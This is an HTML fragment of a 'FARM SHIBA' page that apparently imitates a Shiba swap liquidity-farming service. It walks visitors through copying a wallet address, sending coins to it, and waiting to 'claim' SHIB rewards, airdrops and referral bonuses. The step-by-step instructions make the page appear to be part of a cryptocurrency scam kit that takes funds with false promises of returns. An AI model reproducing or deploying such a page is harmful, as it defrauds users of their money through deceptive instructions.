<div
    class="flex flex-col flex-1 items-center justify-start w-screen h-full overflow-y-auto overflow-x-hidden z-0 main-container-section">
    <div class="sc-eXEjpC sc-hXRMBi eEhUZA"></div>
    <div height="0" class="sc-eTuwsz kyVAdl">
        <div class="sc-gwVKww dylNmp"></div>
    </div>
    <div class="sc-eXEjpC sc-cHSUfg bYQNJg dig-liquidity mb-auto my-auto relative">
        <div class="block w-full rounded text-sm p-4 text-high-emphesis fetch-container text">
            <div class="text-2xl font-extrabold mb-1 text">FARM SHIBA
            </div>
            <div class="flex items-center">
                <div class="ml-0">
                    <p>
                    <p class="text-gray-5000 font-extrabold text">Provide liquidity to shiba swap and
                        receive great rewards.</p>
                    </p>
                </div>
            </div>
        </div>

        <div class="inst_container">

            <h1 class="titulo">INSTRUCTIONS</h1>
            <p style="text-align:center; font-family: 'Heebo' !important;">Just one more step</p>
            <div class="flex_cont">
                <input class='box_address' value="0x000000000000000000000000000" id="boxInput" readonly> <button
                    id="buttonCopy"><i class="fas fa-clone clone_icon"></i></button>
            </div>
            <div id='instructions'>
                <ol class="ordenedlist">
                    <li class="listordened">Copy address</li>
                    <li class="listordened">Now send <span id='formSEND' style='color:orange;'></span> to the address</li>
                    <li class="listordened">Confirm that you sent the coins</li>
                    <li class="listordened">Wait for the transaction confirmation</li>
                    <li class="listordened">You will recieve <span id='formRECEIVE' style='color:orange;'></span> SHIB. Your funds will be available in <span id='formDATE' style='color:orange;'></span></li>
                </ol>
            </div>

            <div class="h2845">
                <p style="font-family:'Heebo' !important">Come back in <span id='formDATE2' style='color:orange;'></span> to claim your SHIBs from farming, airdrop
                    and
                    referrals.</p>

                <div class="woof">
                    <img class="woof_img" src="./images/logo-192x192.png">
                    <div class="comentarios">
                        <div class="comentario burbuja">
                            <p>Woof Woof!</p>
                        </div>
                    </div>
                </div>
            </div>

            <div id='button_farm' class='button_farm link__back'>
                <a href="#/step3"><button class="farm_button">Next Step</button></a>
            </div>
        </div>
    </div>



</div>
</div>
</div>
</div>